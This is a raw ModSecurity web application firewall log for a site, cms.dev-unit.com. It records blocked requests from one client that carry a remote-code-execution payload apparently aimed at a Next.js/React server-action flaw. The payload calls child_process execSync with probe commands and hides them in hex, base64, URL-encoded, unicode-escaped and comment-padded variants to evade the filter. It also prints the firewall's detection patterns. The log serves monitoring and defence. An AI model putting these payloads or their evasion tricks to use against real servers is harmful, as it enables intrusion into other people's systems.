"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dp2AAAAQI"] [Sun Apr 05 15:42:37.324150 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:43902] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dp2gAAAQM"] [Sun Apr 05 15:42:37.325496 2026] [:error] [pid 1309:tid 1391] [client 172.94.9.253:43956] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzT-XKUNJEHmNu6G7vgAAAJQ"] [Sun Apr 05 15:42:37.340843 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:43984] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzbxQSOrq_iRTM7dp2wAAAQY"] [Sun Apr 05 15:42:37.340926 2026] [:error] [pid 1503:tid 1514] [client 172.94.9.253:43998] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzUI7AjfUQYCN-J7DqQAAAMU"] [Sun Apr 05 15:42:37.341521 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:43892] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dp3QAAARI"] [Sun Apr 05 15:42:37.342243 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:43946] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzbxQSOrq_iRTM7dp3AAAARA"] [Sun Apr 05 15:42:37.342412 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:43968] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzZc83uMXRUE9zvQTBQAAAc0"] [Sun Apr 05 15:42:37.342756 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:43918] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzbxQSOrq_iRTM7dp3gAAAQs"] [Sun Apr 05 15:42:37.345459 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:43884] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzbxQSOrq_iRTM7dp3wAAAQU"] [Sun Apr 05 15:42:37.345591 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:43930] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dp4AAAAQo"] [Sun Apr 05 15:42:37.426233 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:44054] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzZc83uMXRUE9zvQTBgAAAcM"] [Sun Apr 05 15:42:37.427353 2026] [:error] [pid 23077:tid 23090] [client 172.94.9.253:44094] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzZc83uMXRUE9zvQTBwAAAcc"] [Sun Apr 05 15:42:37.427792 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:44102] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzbxQSOrq_iRTM7dp4gAAAQo"] [Sun Apr 05 15:42:37.428638 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:44032] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzZc83uMXRUE9zvQTCAAAAcU"] [Sun Apr 05 15:42:37.428648 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:44012] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzbxQSOrq_iRTM7dp4wAAAQU"] [Sun Apr 05 15:42:37.428905 2026] [:error] [pid 1503:tid 1505] [client 172.94.9.253:44078] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzUI7AjfUQYCN-J7DqgAAAMA"] [Sun Apr 05 15:42:37.431568 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:44046] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzbxQSOrq_iRTM7dp5AAAAQ4"] [Sun Apr 05 15:42:37.433357 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:44088] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzbxQSOrq_iRTM7dp5QAAARY"] [Sun Apr 05 15:42:37.436754 2026] [:error] [pid 1503:tid 1539] [client 172.94.9.253:44070] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname 